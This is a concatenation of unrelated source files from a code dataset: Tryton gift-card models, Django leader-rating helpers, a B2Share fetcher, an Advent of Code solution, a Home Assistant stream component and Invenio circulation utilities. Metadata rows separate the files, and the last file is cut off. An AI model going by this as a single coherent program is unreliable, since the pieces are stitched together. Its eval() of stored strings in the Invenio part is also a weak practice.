from trytond.pyson import Eval, Bool
__all__ = ['Product', 'GiftCardPrice']
__metaclass__ = PoolMeta
class Product:
"Product"
__name__ = 'product.product'
is_gift_card = fields.Boolean("Is Gift Card ?")
gift_card_delivery_mode = fields.Selection([
('virtual', 'Virtual'),
('physical', 'Physical'),
('combined', 'Combined'),
], 'Gift Card Delivery Mode')
allow_open_amount = fields.Boolean("Allow Open Amount ?")
gc_min = fields.Numeric("Gift Card Minimum Amount")
gc_max = fields.Numeric("Gift Card Maximum Amount")
gift_card_prices = fields.One2Many(
'product.product.gift_card.price', 'product', 'Gift Card Prices',
)
@classmethod
def view_attributes(cls):
return super(Product, cls).view_attributes() + [
('//group[@id="gift_card_info"]', 'states', {
'invisible': ~Bool(Eval('is_gift_card'))
})]
@staticmethod
def default_gift_card_delivery_mode():
return 'physical'
@staticmethod
def default_is_gift_card():
return False
@staticmethod
def default_allow_open_amount():
return False
@classmethod
def __setup__(cls):
super(Product, cls).__setup__()
cls._error_messages.update({
'inappropriate_product':
'Product %s is not appropriate under %s delivery mode',
'invalid_amount':
'Gift Card minimum amount must be smaller than gift card '
'maximum amount',
'negative_amount_not_allowed':
'Gift card amounts can not be negative'
})
@classmethod
def validate(cls, templates):
"""
Validates each product template
"""
super(Product, cls).validate(templates)
for template in templates:
template.check_type_and_mode()
template.check_gc_min_max()
def check_gc_min_max(self):
"""
Check minimum amount to be smaller than maximum amount
"""
if not self.allow_open_amount:
return
if self.gc_min < 0 or self.gc_max < 0:
self.raise_user_error("negative_amount_not_allowed")
if self.gc_min > self.gc_max:
self.raise_user_error("invalid_amount")
def check_type_and_mode(self):
"""
Type must be service only if delivery mode is virtual
Type must be goods only if delivery mode is combined or physical
"""
if not self.is_gift_card:
return
if (
self.gift_card_delivery_mode == 'virtual' and
self.type != 'service'
) or (
self.gift_card_delivery_mode in ['physical', 'combined'] and
self.type != 'goods'
):
self.raise_user_error(
"inappropriate_product", (
self.rec_name, self.gift_card_delivery_mode
)
)
class GiftCardPrice(ModelSQL, ModelView):
"Gift Card Price"
__name__ = 'product.product.gift_card.price'
_rec_name = 'price'
product = fields.Many2One(
"product.product", "Product", required=True, select=True
)
price = fields.Numeric("Price", required=True)
@classmethod
def __setup__(cls):
super(GiftCardPrice, cls).__setup__()
cls._error_messages.update({
'negative_amount': 'Price can not be negative'
})
@classmethod
def validate(cls, prices):
"""
Validate product price for gift card
"""
super(GiftCardPrice, cls).validate(prices)
for price in prices:
price.check_price()
def check_price(self):
"""
Price can not be negative
"""
if self.price < 0:
self.raise_user_error("negative_amount")
| bsd-3-clause | -2,309,821,036,936,442,000 | 26.246575 | 74 | 0.565108 | false |
DavidCain/WinterSchool | ws/utils/ratings.py | 1 | 7905 | from datetime import timedelta
from django.db.models import Case, F, IntegerField, Q, Sum, When
import ws.utils.perms as perm_utils
from ws import models
from ws.utils.dates import local_date, local_now, ws_year
def deactivate_ratings(participant, activity):
""" Mark any existing ratings for the activity as inactive. """
find_ratings = {
'participant__pk': participant.pk,
'activity': activity,
'active': True,
}
for existing in models.LeaderRating.objects.filter(Q(**find_ratings)):
existing.active = False
existing.save()
class LeaderApplicationMixin:
""" Some common tools for interacting with LeaderApplication objects.
Requires self.activity
"""
def can_reapply(self, latest_application):
""" Winter School allows one application per year.
Other activities just impose a reasonable waiting time.
"""
if not latest_application:
return True # Not "re-applying," just applying for first time
if latest_application.activity == models.LeaderRating.WINTER_SCHOOL:
return latest_application.year < self.application_year
# Allow upgrades after 2 weeks, repeat applications after ~6 months
waiting_period_days = 14 if latest_application.rating_given else 180
time_passed = local_now() - latest_application.time_created
return time_passed > timedelta(days=waiting_period_days)
@property
def application_year(self):
if self.activity == 'winter_school':
return ws_year()
return local_date().year
@property
def num_chairs(self):
""" Return the number of chairs for this activity. """
# It's important that this remain a property (dynamically requested, not stored at init)
# This way, views that want to get activity from self.kwargs can inherit from the mixin
if not hasattr(self, '_num_chairs'):
self._num_chairs = perm_utils.num_chairs(self.activity)
return self._num_chairs
@property
def model(self):
""" Return the application model for this activity type.
The model will be None if no application exists for the activity.
"""
if not hasattr(self, '_model'):
self._model = models.LeaderApplication.model_from_activity(self.activity)
return self._model
def joined_queryset(self):
""" Return applications, joined with commonly used attributes.
Warning: Will raise an AttributeError if self.model failed to find
an application type.
"""
applications = self.model.objects.select_related('participant')
return applications.prefetch_related(
'participant__leaderrecommendation_set', 'participant__leaderrating_set'
)
class RatingsRecommendationsMixin:
""" Query tools for counting ratings & recs for LeaderApplications.
Requires self.chair to to be a Participant object (that chairs the activity).
"""
@property
def gave_rec(self):
""" Select applications where the chair gave a recommendation. """
return Q(
participant__leaderrecommendation__time_created__gte=F('time_created'),
participant__leaderrecommendation__activity=self.activity,
participant__leaderrecommendation__creator=self.chair,
)
@property
def gave_rating(self):
""" Select applications where a rating was created after app creation. """
return Q(
# NOTE: Rating doesn't need to be active (if the leader was
# deactivated, we don't want their application to re-appear)
participant__leaderrating__time_created__gte=F('time_created'),
participant__leaderrating__activity=self.activity,
)
@staticmethod
def sum_annotation(selector):
# Django 2.0: Use conditional aggregation instead
return Sum(Case(When(selector, then=1), default=0, output_field=IntegerField()))
class ApplicationManager(LeaderApplicationMixin, RatingsRecommendationsMixin):
""" Leader applications for an activity, to be displayed to the chair. """
def __init__(self, *args, **kwargs):
# Set only if defined (so subclasses can instead define with @property)
# Also, pop from kwargs so object.__init__ doesn't error out
if 'chair' in kwargs:
self.chair = kwargs.pop('chair') # <Participant>
if 'activity' in kwargs:
self.activity = kwargs.pop('activity')
super().__init__(*args, **kwargs)
def sorted_annotated_applications(self):
""" Sort all applications by order of attention they need. """
applications = self.joined_queryset()
# Identify which have ratings and/or the leader's recommendation
applications = applications.annotate(
num_ratings=self.sum_annotation(self.gave_rating),
num_recs=self.sum_annotation(self.gave_rec),
)
return applications.distinct().order_by(
'-archived', 'num_ratings', 'num_recs', 'time_created'
)
def pending_applications(self):
""" All applications which do not yet have a rating.
NOTE: This immediately queries the database. If you need to deal with
past applications in addition to pending ones, it's recommended to call
sorted_annotated_applications() and then do Python-based filtering from
there.
Includes applications which should be given a recommendation first as
well as applications that are merely awaiting a chair rating.
"""
# Some activities don't actually have an application type defined! (e.g. 'cabin')
# Exit early so we don't fail trying to build a database query
if self.model is None:
return []
return list(
self.sorted_annotated_applications()
.filter(num_ratings=0)
.exclude(archived=True)
)
@staticmethod
def _chair_should_recommend(app):
""" Return if the chair should be expected to recommend this application.
This determines where the application appears in the queue of pending
applications (assuming it's a pending application in the first place!).
"""
if app.archived: # The application is no longer pending
return False
if app.num_recs: # The chair has already made a recommendation
return False
if app.num_ratings: # The application received a rating
return False
return True
def needs_rec(self, applications):
""" Applications which need to be given a rating by the viewing chair.
If there's only one chair, then this will be a blank list (it makes no sense
for a chair to make recommendations when there are no co-chairs to heed
those recommendations).
"""
if self.model is None or self.num_chairs < 2:
return []
return [app for app in applications if self._chair_should_recommend(app)]
def _should_rate(self, app):
if app.archived: # The application is no longer pending
return False
if app.num_ratings: # The application received a rating
return False
# If there are multiple chairs, we request recommendations first
if self.num_chairs > 1:
return bool(app.num_recs)
return True
def needs_rating(self, applications):
""" Return applications which need a rating, but not a recommendation.
When there are multiple chairs, we count certain applications as
needing a recommendation first. It's true that these applications need
a rating as well, but we don't want to double count.
"""
return [app for app in applications if self._should_rate(app)]
| gpl-3.0 | -4,544,151,928,431,443,500 | 37.560976 | 96 | 0.651739 | false |
emanueldima/b2share | b2share/modules/deposit/fetchers.py | 1 | 1411 | # -*- coding: utf-8 -*-
#
# This file is part of EUDAT B2Share.
# Copyright (C) 2016 CERN.
#
# B2Share is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# B2Share is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with B2Share; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
"""PID Fetchers."""
from collections import namedtuple
from .providers import DepositUUIDProvider
FetchedPID = namedtuple('FetchedPID', ['provider', 'pid_type', 'pid_value'])
def b2share_deposit_uuid_fetcher(record_uuid, data):
"""Fetch a deposit's identifiers."""
return FetchedPID(
provider=DepositUUIDProvider,
pid_type=DepositUUIDProvider.pid_type,
pid_value=str(data['_deposit']['id']),
)
| gpl-2.0 | -4,996,539,150,165,683,000 | 35.179487 | 76 | 0.736357 | false |
suprzer0/aoc2016 | day4/solve.py | 1 | 1719 | from collections import namedtuple, Counter
from itertools import groupby
import re
from string import ascii_lowercase
Room = namedtuple('Room', ['name', 'id', 'chksum'])
def common_chars(text):
chars = ''
cnt = Counter(text)
del cnt['-']
for group in groupby(cnt.most_common(), key=lambda c: c[1]):
chars += ''.join(sorted(g[0] for g in group[1]))
return chars
def decrypt(s, offset):
offset %= len(ascii_lowercase)
rotated = ascii_lowercase[offset:]+ascii_lowercase[:offset]
newmap = str.maketrans(ascii_lowercase+'-', rotated+' ')
return str.translate(s, newmap)
def solve_p1(data):
"""
"""
valid_roomid_sum = 0
for room in data:
if common_chars(room.name).startswith(room.chksum):
valid_roomid_sum += room.id
return valid_roomid_sum
def solve_p2(data):
"""
"""
for room in data:
if common_chars(room.name).startswith(room.chksum):
d = decrypt(room.name, room.id)
if d.replace(' ', '').startswith('northpoleobjects'):
return room.id
return None
room_re = re.compile(r'^(\w+(?:-\w+)*)-(\d+)\[(\w+)\]$')
def load_data(inputfile):
"""
Converts the data from the input file into something usable
by the solve functions.
"""
rooms = []
for line in inputfile:
matches = room_re.match(line)
name, roomid, chksum = matches.groups()
rooms.append(Room(name, int(roomid), chksum))
return rooms
if __name__ == '__main__':
with open('input.txt', 'r') as inputfile:
data = load_data(inputfile)
print("Part 1 Solution")
print(solve_p1(data))
print("Part 2 Solution")
print(solve_p2(data))
| mit | 5,726,174,863,873,327,000 | 25.045455 | 65 | 0.601513 | false |
pschmitt/home-assistant | homeassistant/components/stream/__init__.py | 2 | 7096 | """Provide functionality to stream video source."""
import logging
import secrets
import threading
import voluptuous as vol
from homeassistant.const import CONF_FILENAME, EVENT_HOMEASSISTANT_STOP
from homeassistant.core import callback
from homeassistant.exceptions import HomeAssistantError
import homeassistant.helpers.config_validation as cv
from homeassistant.loader import bind_hass
from .const import (
ATTR_ENDPOINTS,
ATTR_STREAMS,
CONF_DURATION,
CONF_LOOKBACK,
CONF_STREAM_SOURCE,
DOMAIN,
SERVICE_RECORD,
)
from .core import PROVIDERS
from .hls import async_setup_hls
_LOGGER = logging.getLogger(__name__)
CONFIG_SCHEMA = vol.Schema({DOMAIN: vol.Schema({})}, extra=vol.ALLOW_EXTRA)
STREAM_SERVICE_SCHEMA = vol.Schema({vol.Required(CONF_STREAM_SOURCE): cv.string})
SERVICE_RECORD_SCHEMA = STREAM_SERVICE_SCHEMA.extend(
{
vol.Required(CONF_FILENAME): cv.string,
vol.Optional(CONF_DURATION, default=30): int,
vol.Optional(CONF_LOOKBACK, default=0): int,
}
)
@bind_hass
def request_stream(hass, stream_source, *, fmt="hls", keepalive=False, options=None):
"""Set up stream with token."""
if DOMAIN not in hass.config.components:
raise HomeAssistantError("Stream integration is not set up.")
if options is None:
options = {}
# For RTSP streams, prefer TCP
if isinstance(stream_source, str) and stream_source[:7] == "rtsp://":
options = {
"rtsp_flags": "prefer_tcp",
"stimeout": "5000000",
**options,
}
try:
streams = hass.data[DOMAIN][ATTR_STREAMS]
stream = streams.get(stream_source)
if not stream:
stream = Stream(hass, stream_source, options=options, keepalive=keepalive)
streams[stream_source] = stream
else:
# Update keepalive option on existing stream
stream.keepalive = keepalive
# Add provider
stream.add_provider(fmt)
if not stream.access_token:
stream.access_token = secrets.token_hex()
stream.start()
return hass.data[DOMAIN][ATTR_ENDPOINTS][fmt].format(stream.access_token)
except Exception:
raise HomeAssistantError("Unable to get stream")
async def async_setup(hass, config):
"""Set up stream."""
# Set log level to error for libav
logging.getLogger("libav").setLevel(logging.ERROR)
# Keep import here so that we can import stream integration without installing reqs
# pylint: disable=import-outside-toplevel
from .recorder import async_setup_recorder
hass.data[DOMAIN] = {}
hass.data[DOMAIN][ATTR_ENDPOINTS] = {}
hass.data[DOMAIN][ATTR_STREAMS] = {}
# Setup HLS
hls_endpoint = async_setup_hls(hass)
hass.data[DOMAIN][ATTR_ENDPOINTS]["hls"] = hls_endpoint
# Setup Recorder
async_setup_recorder(hass)
@callback
def shutdown(event):
"""Stop all stream workers."""
for stream in hass.data[DOMAIN][ATTR_STREAMS].values():
stream.keepalive = False
stream.stop()
_LOGGER.info("Stopped stream workers")
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_STOP, shutdown)
async def async_record(call):
"""Call record stream service handler."""
await async_handle_record_service(hass, call)
hass.services.async_register(
DOMAIN, SERVICE_RECORD, async_record, schema=SERVICE_RECORD_SCHEMA
)
return True
class Stream:
"""Represents a single stream."""
def __init__(self, hass, source, options=None, keepalive=False):
"""Initialize a stream."""
self.hass = hass
self.source = source
self.options = options
self.keepalive = keepalive
self.access_token = None
self._thread = None
self._thread_quit = None
self._outputs = {}
if self.options is None:
self.options = {}
@property
def outputs(self):
"""Return stream outputs."""
return self._outputs
def add_provider(self, fmt):
"""Add provider output stream."""
if not self._outputs.get(fmt):
provider = PROVIDERS[fmt](self)
self._outputs[fmt] = provider
return self._outputs[fmt]
def remove_provider(self, provider):
"""Remove provider output stream."""
if provider.name in self._outputs:
del self._outputs[provider.name]
self.check_idle()
if not self._outputs:
self.stop()
def check_idle(self):
"""Reset access token if all providers are idle."""
if all([p.idle for p in self._outputs.values()]):
self.access_token = None
def start(self):
"""Start a stream."""
# Keep import here so that we can import stream integration without installing reqs
# pylint: disable=import-outside-toplevel
from .worker import stream_worker
if self._thread is None or not self._thread.isAlive():
self._thread_quit = threading.Event()
self._thread = threading.Thread(
name="stream_worker",
target=stream_worker,
args=(self.hass, self, self._thread_quit),
)
self._thread.start()
_LOGGER.info("Started stream: %s", self.source)
def stop(self):
"""Remove outputs and access token."""
self._outputs = {}
self.access_token = None
if not self.keepalive:
self._stop()
def _stop(self):
"""Stop worker thread."""
if self._thread is not None:
self._thread_quit.set()
self._thread.join()
self._thread = None
_LOGGER.info("Stopped stream: %s", self.source)
async def async_handle_record_service(hass, call):
"""Handle save video service calls."""
stream_source = call.data[CONF_STREAM_SOURCE]
video_path = call.data[CONF_FILENAME]
duration = call.data[CONF_DURATION]
lookback = call.data[CONF_LOOKBACK]
# Check for file access
if not hass.config.is_allowed_path(video_path):
raise HomeAssistantError(f"Can't write {video_path}, no access to path!")
# Check for active stream
streams = hass.data[DOMAIN][ATTR_STREAMS]
stream = streams.get(stream_source)
if not stream:
stream = Stream(hass, stream_source)
streams[stream_source] = stream
# Add recorder
recorder = stream.outputs.get("recorder")
if recorder:
raise HomeAssistantError(f"Stream already recording to {recorder.video_path}!")
recorder = stream.add_provider("recorder")
recorder.video_path = video_path
recorder.timeout = duration
stream.start()
# Take advantage of lookback
hls = stream.outputs.get("hls")
if lookback > 0 and hls:
num_segments = min(int(lookback // hls.target_duration), hls.num_segments)
# Wait for latest segment, then add the lookback
await hls.recv()
recorder.prepend(list(hls.get_segment())[-num_segments:])
| apache-2.0 | -3,241,758,894,251,153,000 | 29.718615 | 91 | 0.628241 | false |
robk5uj/invenio | modules/bibcirculation/lib/bibcirculation_utils.py | 1 | 21415 | # -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2008, 2009, 2010, 2011 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""BibCirculation Utils: Auxiliary methods of BibCirculation """
__revision__ = "$Id$"
from invenio.search_engine_utils import get_fieldvalues
from invenio.bibtask import task_low_level_submission
import invenio.bibcirculation_dblayer as db
from invenio.urlutils import create_html_link
from invenio.config import CFG_SITE_URL, CFG_TMPDIR
from invenio.bibcirculation_config import CFG_BIBCIRCULATION_AMAZON_ACCESS_KEY, \
CFG_BIBCIRCULATION_WORKING_DAYS, \
CFG_BIBCIRCULATION_HOLIDAYS
from invenio.messages import gettext_set_language
import datetime, time, re
DICC_REGEXP = re.compile("^\{('[^']*': ?('[^']*'|[0-9]*|None)(, ?'[^']*': ?('[^']*'|[0-9]*|None))*)?\}$")
def hold_request_mail(recid, borrower_id):
"""
Create the mail who will be sent for each hold requests.
@param recid: identify the record. Primary key of bibrec.
@type recid: int
@param borrower_id: identify the borrower. Primary key of crcBORROWER.
@type borrower_id: int
@return email(body)
"""
(book_title, book_year, book_author,
book_isbn, book_editor) = book_information_from_MARC(recid)
############## need some code refactoring ###############
more_holdings_infos = db.get_holdings_details(recid)
borrower_infos = db.get_borrower_details(borrower_id)
#########################################################
title_link = create_html_link(CFG_SITE_URL +
'/admin/bibcirculation/bibcirculationadmin.py/get_item_details',
{'recid': recid},
(book_title))
out = """
This is an automatic email for confirming the hold request for a
book on behalf of:
%s (email: %s)
title: %s
author: %s
location: %s
library: %s
publisher: %s
year: %s
isbn: %s
""" % (borrower_infos[1], borrower_infos[2],
title_link, book_author, more_holdings_infos[0][1],
more_holdings_infos[0][2],
book_editor, book_year, book_isbn)
return out
def get_book_cover(isbn):
"""
Retrieve book cover using Amazon web services.
@param isbn: book's isbn
@type isbn: string
@return book cover
"""
from xml.dom import minidom
import urllib
# connect to AWS
cover_xml = urllib.urlopen('http://ecs.amazonaws.com/onca/xml' \
'?Service=AWSECommerceService&AWSAccessKeyId=' \
+ CFG_BIBCIRCULATION_AMAZON_ACCESS_KEY + \
'&Operation=ItemSearch&Condition=All&' \
'ResponseGroup=Images&SearchIndex=Books&' \
'Keywords=' + isbn)
# parse XML
try:
xml_img = minidom.parse(cover_xml)
retrieve_book_cover = xml_img.getElementsByTagName('MediumImage')
book_cover = retrieve_book_cover.item(0).firstChild.firstChild.data
except AttributeError:
book_cover = "%s/img/book_cover_placeholder.gif" % (CFG_SITE_URL)
return book_cover
def book_information_from_MARC(recid):
"""
Retrieve book's information from MARC
@param recid: identify the record. Primary key of bibrec.
@type recid: int
@return tuple with title, year, author, isbn and editor.
"""
book_title = ' '.join(get_fieldvalues(recid, "245__a") + \
get_fieldvalues(recid, "245__b") + \
get_fieldvalues(recid, "245__n") + \
get_fieldvalues(recid, "245__p"))
book_year = ' '.join(get_fieldvalues(recid, "260__c"))
book_author = ' '.join(get_fieldvalues(recid, "100__a") + \
get_fieldvalues(recid, "100__u"))
book_isbn = ' '.join(get_fieldvalues(recid, "020__a"))
book_editor = ' , '.join(get_fieldvalues(recid, "260__a") + \
get_fieldvalues(recid, "260__b"))
return (book_title, book_year, book_author, book_isbn, book_editor)
def book_title_from_MARC(recid):
"""
Retrieve book's title from MARC
@param recid: identify the record. Primary key of bibrec.
@type recid: int
@return book's title
"""
book_title = ' '.join(get_fieldvalues(recid, "245__a") + \
get_fieldvalues(recid, "245__b") + \
get_fieldvalues(recid, "245__n") + \
get_fieldvalues(recid, "245__p"))
return book_title
def update_status_if_expired(loan_id):
"""
Update the loan's status if status is 'expired'.
@param loan_id: identify the loan. Primary key of crcLOAN.
@type loan_id: int
"""
loan_status = db.get_loan_status(loan_id)
if loan_status == 'expired':
db.update_loan_status('on loan', loan_id)
return
def get_next_day(date_string):
"""
Get the next day
@param date_string: date
@type date_string: string
return next day
"""
# add 1 day
more_1_day = datetime.timedelta(days=1)
# convert date_string to datetime format
tmp_date = time.strptime(date_string, '%Y-%m-%d')
# calculate the new date (next day)
next_day = datetime.datetime(*tmp_date[:3]) + more_1_day
return next_day
def generate_new_due_date(days):
"""
Generate a new due date (today + X days = new due date).
@param days: number of days
@type days: string
@return new due date
"""
today = datetime.date.today()
more_X_days = datetime.timedelta(days=days)
tmp_date = today + more_X_days
week_day = tmp_date.strftime('%A')
due_date = tmp_date.strftime('%Y-%m-%d')
due_date_validated = False
while not due_date_validated:
if week_day in CFG_BIBCIRCULATION_WORKING_DAYS and due_date not in CFG_BIBCIRCULATION_HOLIDAYS:
due_date_validated = True
else:
next_day = get_next_day(due_date)
due_date = next_day.strftime('%Y-%m-%d')
week_day = next_day.strftime('%A')
return due_date
def renew_loan_for_X_days(barcode):
"""
Renew a loan based on its loan period
@param barcode: identify the item. Primary key of crcITEM.
@type barcode: string
@return new due date
"""
loan_period = db.get_loan_period(barcode)
if loan_period == '4 weeks':
due_date = generate_new_due_date(30)
else:
due_date = generate_new_due_date(7)
return due_date
def make_copy_available(request_id):
"""
Change the status of a copy for 'available' when
an hold request was cancelled.
@param request_id: identify the request: Primary key of crcLOANREQUEST
@type request_id: int
"""
barcode_requested = db.get_requested_barcode(request_id)
db.update_item_status('available', barcode_requested)
return
def print_new_loan_information(req, ln):
"""
Create a printable format with the information of the last
loan who has been registered on the table crcLOAN.
"""
_ = gettext_set_language(ln)
# get the last loan from crcLOAN
(recid, borrower_id, due_date) = db.get_last_loan()
# get book's information
(book_title, book_year, book_author, book_isbn, book_editor) = book_information_from_MARC(recid)
# get borrower's data/information (name, address, email)
(borrower_name, borrower_address, borrower_email) = db.get_borrower_data(borrower_id)
# Generate printable format
req.content_type = "text/html"
req.send_http_header()
out = """<table style='width:95%; margin:auto; max-width: 600px;'>"""
out += """
<tr>
<td><img src="%s/img/CERN_CDS_logo.png"></td>
</tr>
</table><br />""" % (CFG_SITE_URL)
out += """<table style='color: #79d; font-size: 82%; width:95%; margin:auto; max-width: 400px;'>"""
out += """ <tr><td align="center"><h2><strong>%s</strong></h2></td></tr>""" % (_("Loan information"))
out += """ <tr><td align="center"><strong>%s</strong></td></tr>""" % (_("This book is sent to you ..."))
out += """</table><br />"""
out += """<table style='color: #79d; font-size: 82%; width:95%; margin:auto; max-width: 400px;'>"""
out += """<tr>
<td width="70"><strong>%s</strong></td><td style='color: black;'>%s</td>
</tr>
<tr>
<td width="70"><strong>%s</strong></td><td style='color: black;'>%s</td>
</tr>
<tr>
<td width="70"><strong>%s</strong></td><td style='color: black;'>%s</td>
</tr>
<tr>
<td width="70"><strong>%s</strong></td><td style='color: black;'>%s</td>
</tr>
<tr>
<td width="70"><strong>%s</strong></td><td style='color: black;'>%s</td>
</tr>
""" % (_("Title"), book_title,
_("Author"), book_author,
_("Editor"), book_editor,
_("ISBN"), book_isbn,
_("Year"), book_year)
out += """</table><br />"""
out += """<table style='color: #79d; font-size: 82%; width:95%; margin:auto; max-width: 400px;'>"""
out += """<tr>
<td width="70"><strong>%s</strong></td><td style='color: black;'>%s</td>
</tr>
<tr>
<td width="70"><strong>%s</strong></td><td style='color: black;'>%s</td>
</tr>
<tr>
<td width="70"><strong>%s</strong></td><td style='color: black;'>%s</td>
</tr>
<tr>
<td width="70"><strong>%s</strong></td><td style='color: black;'>%s</td>
</tr> """ % (_("Id"), borrower_id,
_("Name"), borrower_name,
_("Address"), borrower_address,
_("Email"), borrower_email)
out += """</table> <br />"""
out += """<table style='color: #79d; font-size: 82%; width:95%; margin:auto; max-width: 400px;'>"""
out += """ <tr><td align="center"><h2><strong>%s: %s</strong></h2></td></tr>""" % (_("Due date"), due_date)
out += """</table>"""
out += """<table style='color: #79d; font-size: 82%; width:95%; margin:auto; max-width: 800px;'>
<tr><td><input type="button" onClick='window.print()'
value='Print' style='color: #fff; background: #36c; font-weight: bold;'></td></tr>
</table>"""
req.write("<html>")
req.write(out)
req.write("</html>")
return "\n"
def print_pending_hold_requests_information(req, ln):
"""
Create a printable format with all the information about all
pending hold requests.
"""
_ = gettext_set_language(ln)
requests = db.get_pdf_request_data('pending')
req.content_type = "text/html"
req.send_http_header()
out = """<table style='width:100%; margin:auto; max-width: 1024px;'>"""
out += """
<tr>
<td><img src="%s/img/CERN_CDS_logo.png"></td>
</tr>
</table><br />""" % (CFG_SITE_URL)
out += """<table style='color: #79d; font-size: 82%; width:95%; margin:auto; max-width: 1024px;'>"""
out += """ <tr><td align="center"><h2><strong>%s</strong></h2></td></tr>""" % (_("List of pending hold requests"))
out += """ <tr><td align="center"><strong>%s</strong></td></tr>""" % (time.ctime())
out += """</table><br/>"""
out += """<table style='color: #79d; font-size: 82%; width:95%; margin:auto; max-width: 1024px;'>"""
out += """<tr>
<td><strong>%s</strong></td>
<td><strong>%s</strong></td>
<td><strong>%s</strong></td>
<td><strong>%s</strong></td>
<td><strong>%s</strong></td>
<td><strong>%s</strong></td>
<td><strong>%s</strong></td>
</tr>
""" % (_("Borrower"),
_("Item"),
_("Library"),
_("Location"),
_("From"),
_("To"),
_("Request date"))
for (recid, borrower_name, library_name, location, date_from, date_to, request_date) in requests:
out += """<tr style='color: black;'>
<td class="bibcirccontent">%s</td>
<td class="bibcirccontent">%s</td>
<td class="bibcirccontent">%s</td>
<td class="bibcirccontent">%s</td>
<td class="bibcirccontent">%s</td>
<td class="bibcirccontent">%s</td>
<td class="bibcirccontent">%s</td>
</tr>
""" % (borrower_name, book_title_from_MARC(recid), library_name,
location, date_from, date_to, request_date)
out += """</table>
<br />
<br />
<table style='color: #79d; font-size: 82%; width:95%; margin:auto; max-width: 1024px;'>
<tr>
<td>
<input type=button value='Back' onClick="history.go(-1)"
style='color: #fff; background: #36c; font-weight: bold;'>
<input type="button" onClick='window.print()'
value='Print' style='color: #fff; background: #36c; font-weight: bold;'>
</td>
</tr>
</table>"""
req.write("<html>")
req.write(out)
req.write("</html>")
return "\n"
def get_item_info_for_search_result(recid):
"""
Get the item's info from MARC in order to create a
search result with more details
@param recid: identify the record. Primary key of bibrec.
@type recid: int
@return book's informations (author, editor and number of copies)
"""
book_author = ' '.join(get_fieldvalues(recid, "100__a") + \
get_fieldvalues(recid, "100__u"))
book_editor = ' , '.join(get_fieldvalues(recid, "260__a") + \
get_fieldvalues(recid, "260__b") + \
get_fieldvalues(recid, "260__c"))
book_copies = ' '.join(get_fieldvalues(recid, "964__a"))
book_infos = (book_author, book_editor, book_copies)
return book_infos
def update_request_data(request_id):
"""
Update the status of a given request.
@param request_id: identify the request: Primary key of crcLOANREQUEST
@type request_id: int
"""
barcode = db.get_request_barcode(request_id)
nb_requests = db.get_number_requests_per_copy(barcode)
is_on_loan = db.is_item_on_loan(barcode)
if nb_requests == 0 and is_on_loan is not None:
db.update_item_status('on loan', barcode)
elif nb_requests == 0 and is_on_loan is None:
db.update_item_status('available', barcode)
else:
db.update_item_status('requested', barcode)
return
def compare_dates(date):
"""
Compare given date with today
@param date: given date
@type date: string
@return boolean
"""
if date < time.strftime("%Y-%m-%d"):
return False
else:
return True
def validate_date_format(date):
"""
Verify the date format
@param date: given date
@type date: string
@return boolean
"""
try:
if time.strptime(date, "%Y-%m-%d"):
if compare_dates(date):
return True
else:
return False
except ValueError:
return False
def create_ill_record(book_info):
"""
Create a new ILL record
@param book_info: book's information
@type book_info: tuple
@return MARC record
"""
(title, author, place, publisher, year, edition, isbn) = book_info
ill_record = """
<record>
<datafield tag="020" ind1=" " ind2=" ">
<subfield code="a">%(isbn)s</subfield>
</datafield>
<datafield tag="100" ind1=" " ind2=" ">
<subfield code="a">%(author)s</subfield>
</datafield>
<datafield tag="245" ind1=" " ind2=" ">
<subfield code="a">%(title)s</subfield>
</datafield>
<datafield tag="250" ind1=" " ind2=" ">
<subfield code="a">%(edition)s</subfield>
</datafield>
<datafield tag="260" ind1=" " ind2=" ">
<subfield code="a">%(place)s</subfield>
<subfield code="b">%(publisher)s</subfield>
<subfield code="c">%(year)s</subfield>
</datafield>
<datafield tag="980" ind1=" " ind2=" ">
<subfield code="a">ILLBOOK</subfield>
</datafield>
</record>
""" % {'isbn': isbn,
'author': author,
'title': title,
'edition': edition,
'place': place,
'publisher': publisher,
'year': year}
file_path = '%s/%s_%s.xml' % (CFG_TMPDIR, 'bibcirculation_ill_book',
time.strftime("%Y%m%d_%H%M%S"))
xml_file = open(file_path, 'w')
xml_file.write(ill_record)
xml_file.close()
# Pass XML file to BibUpload.
task_low_level_submission('bibupload', 'bibcirculation', '-P', '5', '-i',
file_path)
return ill_record
def wash_recid_from_ILL_request(ill_request_id):
"""
Get dictionnary and wash recid values.
@param ill_request_id: identify the ILL request. Primray key of crcILLREQUEST
@type ill_request_id: int
@return recid
"""
book_info = db.get_ill_book_info(ill_request_id)
if looks_like_dictionary(book_info):
book_info = eval(book_info)
else:
book_info = None
try:
recid = int(book_info['recid'])
except KeyError:
recid = None
return recid
def get_list_of_ILL_requests():
"""
Get list with all recids related with ILL requests
"""
list_of_recids = []
ill_requests = db.get_ill_ids()
for i in range(len(ill_requests)):
recid = wash_recid_from_ILL_request(ill_requests[i][0])
if recid:
list_of_recids.append(recid)
return list_of_recids
def all_copies_are_missing(recid):
"""
Verify if all copies of an item are missing
@param recid: identify the record. Primary key of bibrec
@type recid: int
@return boolean
"""
copies_status = db.get_copies_status(recid)
number_of_missing = 0
for (status) in copies_status:
if status == 'missing':
number_of_missing += 1
if number_of_missing == len(copies_status):
return True
else:
return False
def has_copies(recid):
"""
Verify if a recid is item (has copies)
@param recid: identify the record. Primary key of bibrec
@type recid: int
@return boolean
"""
copies_status = db.get_copies_status(recid)
if copies_status is None:
return False
else:
